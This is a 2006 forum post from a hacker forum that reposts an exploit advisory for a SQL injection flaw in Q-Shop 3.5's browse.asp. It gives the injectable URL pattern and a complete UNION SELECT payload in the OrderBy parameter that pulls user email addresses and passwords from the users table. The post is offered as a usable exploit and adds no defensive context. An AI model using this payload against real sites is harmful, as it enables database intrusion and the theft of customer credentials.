[Announcement] Q-Shop 3.5 (browse.asp) Remote SQL Injection Vuln |
19/09/2006 04:11:56 (+0700) | #1 | 24203 |
|
LeonHart
HVA Friend
|
Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
|
|
*************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
|
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|